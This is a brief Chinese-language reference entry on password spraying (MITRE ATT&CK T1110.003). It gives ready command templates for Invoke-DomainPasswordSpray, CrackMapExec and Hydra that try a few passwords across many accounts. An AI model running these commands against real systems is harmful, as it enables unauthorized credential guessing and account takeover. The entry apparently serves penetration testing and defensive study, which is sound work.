ATT&CK ID:T1110.003

权限: User

描述:

攻击者有时候需要对不同的账户使用单一或少量的密码进行猜测目标密码

Windows

Invoke-DomainPasswordSpray

Link: https://github.com/dafthack/DomainPasswordSpray

  1. Invoke-DomainPasswordSpray -PasswordList .\Passwords.txt -Domain <Domain> -ErrorAction SilentlyContinue

通用

Crackmapexec

  1. crackmapexec <Service> <IP> -u <UserList> -p <PasswordList>

Hydra

  1. hydra -L <userList> -P <PasswordList> <Service>://<IP> -v -I